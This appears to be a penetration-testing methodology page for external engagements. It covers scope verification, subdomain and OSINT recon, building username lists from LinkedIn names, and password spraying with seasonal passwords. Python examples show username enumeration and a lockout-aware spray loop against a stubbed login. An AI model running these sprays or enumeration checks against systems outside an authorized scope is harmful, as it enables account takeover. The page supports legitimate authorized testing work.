External Pentesting
Last updated
The scope and authorization document should be signed by the client, and a copy kept with the engagement records.
Verify ownership of the in-scope IPs (whois/ASN, reverse DNS) before scanning, to make sure we are not attacking another company.
Subdomains (amass, assetfinder, DNSRecon, Subfinder )
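Subdomain tools happily return hosts on third-party hosting, so the ownership check has to be repeated on whatever they resolve to. The following is an added example (not tooling from this page): it keeps only hosts whose every resolved address sits inside the CIDRs from the signed scope document. The CIDRs and the resolver output are constructed so the script runs offline; in practice the `RESOLVED` mapping comes from resolving the amass/subfinder output.

```python
"""Scope check for external recon: partition discovered hosts into in-scope,
out-of-scope and unresolved, using the client's authorized CIDRs.
Added example; scope ranges and resolver output below are constructed."""
import ipaddress

IN_SCOPE_CIDRS = ["203.0.113.0/24", "2001:db8:10::/48"]   # constructed scope doc ranges

RESOLVED = {                                              # constructed resolver output
    "www.example.com":  ["203.0.113.10"],
    "vpn.example.com":  ["203.0.113.20", "2001:db8:10::20"],
    "blog.example.com": ["198.51.100.5"],                 # third-party hosting
    "mail.example.com": ["203.0.113.30", "198.51.100.7"], # one address outside scope
    "old.example.com":  [],                               # NXDOMAIN
}


def build_networks(cidrs):
    return [ipaddress.ip_network(c, strict=False) for c in cidrs]


def ip_in_scope(ip, networks):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in networks)


def classify_targets(resolved, cidrs):
    """Return (in_scope, out_of_scope, unresolved).

    A host is in scope only if *every* address it resolves to is authorized.
    A host with even one out-of-scope address is reported with the offending
    addresses, because a scanner pointed at the hostname may hit that address."""
    networks = build_networks(cidrs)
    in_scope, out_of_scope, unresolved = [], [], []
    for host, ips in sorted(resolved.items()):
        if not ips:
            unresolved.append(host)
            continue
        bad = [ip for ip in ips if not ip_in_scope(ip, networks)]
        if bad:
            out_of_scope.append((host, bad))
        else:
            in_scope.append(host)
    return in_scope, out_of_scope, unresolved


if __name__ == "__main__":
    ok, bad, unres = classify_targets(RESOLVED, IN_SCOPE_CIDRS)
    print("IN SCOPE:", ok)
    print("OUT OF SCOPE (do not scan):", bad)
    print("UNRESOLVED:", unres)
```

Hosts in the out-of-scope bucket go back to the client for a scope amendment rather than into the scanner.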
Use Google dorking (no space after the operator, or the search engine ignores it):
site:domain.com -www
site:domain.com
site:*.domain.com
First things to do before starting the main part of the engagement.
OpenVAS
Nessus
Research the company's email naming convention (e.g. firstname.lastname, flastname).
Scrape the company's LinkedIn with tools to collect employee names, then combine the names with the candidate conventions to build the user list.
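Turning scraped names into a spray list is mechanical but easy to get wrong (accents, honorifics, duplicates). The script below is an added example, not code from this page: it takes a list of full names and the conventions under consideration and emits one candidate per name per convention. The names and the `CONVENTIONS` table are constructed for illustration; add or remove formats to match what the OSINT phase suggests.

```python
"""Build candidate usernames/emails from scraped names and naming conventions.
Added example; names below are made up and the convention table is an assumption."""
import re
import unicodedata

# format -> template; {f}/{l} are first/last initials
CONVENTIONS = {
    "first.last": "{first}.{last}",
    "flast":      "{f}{last}",
    "firstl":     "{first}{l}",
    "first_last": "{first}_{last}",
    "lastf":      "{last}{f}",
    "first":      "{first}",
}

HONORIFICS = {"mr", "mrs", "ms", "dr", "jr", "sr", "phd", "mba", "cissp"}


def normalize(part):
    """Strip accents and anything that is not a-z/0-9, lowercase the rest."""
    ascii_part = unicodedata.normalize("NFKD", part).encode("ascii", "ignore").decode()
    return re.sub(r"[^a-z0-9]", "", ascii_part.lower())


def split_name(full):
    """'Dr. José García, PhD' -> ('jose', 'garcia'); None if no first+last."""
    tokens = [t for t in full.replace(",", " ").split() if t]
    tokens = [t for t in tokens if normalize(t) not in HONORIFICS]
    if len(tokens) < 2:
        return None
    first, last = normalize(tokens[0]), normalize(tokens[-1])
    return (first, last) if first and last else None


def usernames(names, conventions, domain=None):
    """Return deduplicated candidates, in input order, for the given conventions."""
    out, seen = [], set()
    for full in names:
        parts = split_name(full)
        if not parts:
            continue
        first, last = parts
        fields = {"first": first, "last": last, "f": first[0], "l": last[0]}
        for conv in conventions:
            cand = CONVENTIONS[conv].format(**fields)
            if domain:
                cand = f"{cand}@{domain}"
            if cand not in seen:
                seen.add(cand)
                out.append(cand)
    return out


if __name__ == "__main__":
    # constructed sample of scraped names
    sample = ["Jane Doe", "Dr. José García, PhD", "Madonna", "Jane Doe"]
    for u in usernames(sample, ["first.last", "flast"], domain="example.com"):
        print(u)
```

Validate the winning convention against a handful of addresses found in breach dumps or on the website before spraying the full list, so that failed logons are not wasted on a format the company never used.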
Check login form or password reset forms for user enumeration.
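The enumeration check is a diff: submit a username that cannot exist, then a candidate, and compare the two responses. The following is an added example, not code from this page; the responses are constructed rather than captured from a real target, and the thresholds (`len_delta`, `time_ratio`) are assumptions to tune per application. It reports every difference an attacker could key on: status code, body length, the normalized message, a message that names the username alone, and response time.

```python
"""Flag username enumeration on a login / password-reset form by diffing a
baseline response (impossible username) against a candidate's response.
Added example; Resp samples below are constructed, not real captures."""
import re
from dataclasses import dataclass


@dataclass
class Resp:
    status: int
    body: str
    elapsed_ms: float


# an error that mentions the user/account without "or password" names the username alone
USERNAME_ONLY = re.compile(
    r"(invalid|unknown|incorrect|no such)\s+(user|username|account)\b(?!\s+or\s+password)"
    r"|user (does not|doesn't) exist|account (is )?(locked|disabled)",
    re.I,
)


def normalize(body):
    """Drop tags and token-like hex blobs (CSRF/nonces) so only the message is compared."""
    text = re.sub(r"<[^>]+>", " ", body)
    text = re.sub(r"\b[0-9a-f]{16,}\b", "TOKEN", text, flags=re.I)
    return " ".join(text.split()).lower()


def enumeration_signals(baseline, candidate, len_delta=25, time_ratio=3.0):
    """Return the list of observable differences; an empty list means the form
    answered uniformly for the two usernames."""
    signals = []
    if baseline.status != candidate.status:
        signals.append(f"status {baseline.status} vs {candidate.status}")
    if abs(len(baseline.body) - len(candidate.body)) > len_delta:
        signals.append(f"body length {len(baseline.body)} vs {len(candidate.body)}")
    if normalize(baseline.body) != normalize(candidate.body):
        signals.append(f"message {normalize(baseline.body)!r} vs {normalize(candidate.body)!r}")
    m = USERNAME_ONLY.search(candidate.body)
    if m:
        signals.append(f"username-only error: {m.group(0)!r}")
    fast, slow = sorted((baseline.elapsed_ms, candidate.elapsed_ms))
    if fast > 0 and slow / fast >= time_ratio:
        signals.append(f"timing {baseline.elapsed_ms:.0f}ms vs {candidate.elapsed_ms:.0f}ms")
    return signals


# constructed samples
BASELINE = Resp(200, "<p>Invalid username or password.</p>", 40)
LEAKY    = Resp(200, "<p>Invalid username</p>", 38)                 # distinct message
SAFE     = Resp(200, "<p>Invalid username or password.</p>", 43)    # uniform
SLOW     = Resp(200, "<p>Invalid username or password.</p>", 410)   # hash only run for real users

if __name__ == "__main__":
    for name, cand in (("leaky", LEAKY), ("safe", SAFE), ("slow", SLOW)):
        print(name, enumeration_signals(BASELINE, cand) or "no signal")
```

Repeat the timing comparison several times before reporting it; a single slow response is noise, a consistent ratio across runs is a finding.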
Password strategy: current season + current year + special character; also use the location, street address and company name as the base word.
Password spray
msf: auxiliary/scanner/http/owa_login
Check the OWA Version
Burpsuite Intruder
FFuF
Wfuzz
ike-scan
If Office 365 is in use, for instance, look for other accounts from inside a compromised one.
If portal.azure.com is reachable, look for other accounts there as well.
Password spray with previously found passwords.
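The spray itself is mostly about not locking anyone out: one password across every user per round, and a pause that outlasts the lockout observation window before the next batch of attempts. The script below is an added example, not tooling from this page: it generates the seasonal list from the pattern above and schedules rounds with lockout headroom. `try_login` is a caller-supplied callable (the demo stubs it with a constructed directory) because there is no real target here; the lockout values are placeholders to replace with what the client's policy actually says.

```python
"""Seasonal spray list plus a password-major, lockout-aware spray loop.
Added example; the demo target directory and lockout numbers are constructed."""
import itertools
import time

SEASONS = ["Winter", "Spring", "Summer", "Fall", "Autumn"]
SPECIALS = ["!", "@", "#", "$", ""]


def season_passwords(year, company, location, specials=SPECIALS):
    """Season/Company/Location + YYYY or YY + special char, deduplicated, in order."""
    bases = SEASONS + [company, location]
    years = (str(year), str(year)[-2:])
    cands = [f"{b}{y}{s}" for b, y, s in itertools.product(bases, years, specials)]
    return list(dict.fromkeys(cands))


def spray_plan(passwords, attempts_per_window, window_seconds):
    """Return (index, seconds_to_wait_before_round, password) per round.

    Each round sends one password to every user, so after attempts_per_window
    rounds every account carries that many failures. Waiting a full observation
    window before the next batch lets the bad-password counter reset instead of
    tripping the lockout. Set attempts_per_window below the lockout threshold
    (threshold minus 2 leaves room for the user's own typos)."""
    if attempts_per_window < 1:
        raise ValueError("attempts_per_window must be >= 1")
    plan = []
    for i, pw in enumerate(passwords):
        wait = window_seconds if i and i % attempts_per_window == 0 else 0
        plan.append((i, wait, pw))
    return plan


def run_spray(users, passwords, try_login, attempts_per_window, window_seconds,
              sleep=time.sleep):
    """Return [(user, password)] that authenticated. Accounts already cracked
    are skipped in later rounds so they collect no further failures."""
    hits, cracked = [], set()
    for _, wait, pw in spray_plan(passwords, attempts_per_window, window_seconds):
        if wait:
            sleep(wait)
        for user in users:
            if user in cracked:
                continue
            if try_login(user, pw):
                hits.append((user, pw))
                cracked.add(user)
    return hits


if __name__ == "__main__":
    # constructed demo target: one account with a seasonal password
    directory = {"jdoe@example.com": "Summer2024!"}
    stub_login = lambda u, p: directory.get(u) == p
    pws = season_passwords(2024, "Acme", "Boston")
    print(run_spray(["jdoe@example.com", "asmith@example.com"], pws, stub_login,
                    attempts_per_window=3, window_seconds=1800, sleep=lambda s: None))
```

Keep the round log (timestamp, password, user count) for the report; if an account does lock, that log is what tells the client exactly which attempt did it.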
Bypass MFA
No MFA
Recommend guidelines: NIST, OWASP
Unpatched software or services that need an update.
SecLists
CIRT.net (default password list)
Weak ciphers
Test the SSL Certificate
Verbose error messages
Verbose stack trace
mDNS
Server Version, languages, response headers etc.
Some Broken Authentication finding like "Invalid Username"
Apache default pages
IIS default page
ike-scan
RDP
Telnet
Geo-blocking not in place
Geo-blocking limits the attack surface
Whether to recommend it depends on where the client's customers are located
Brute-Force Attacks
Nmap
Nessus
Web Enum
Have I Been Pwned (check company addresses against known breaches)
Phonebook.cz (search for email addresses and subdomains of a domain)
LinkedIn2Username (generate username lists from a company's LinkedIn employees)
LinkedInt (LinkedIn employee scraper)
CredMaster (password spraying with IP rotation through AWS API Gateway)
TrevorSpray (modular password sprayer)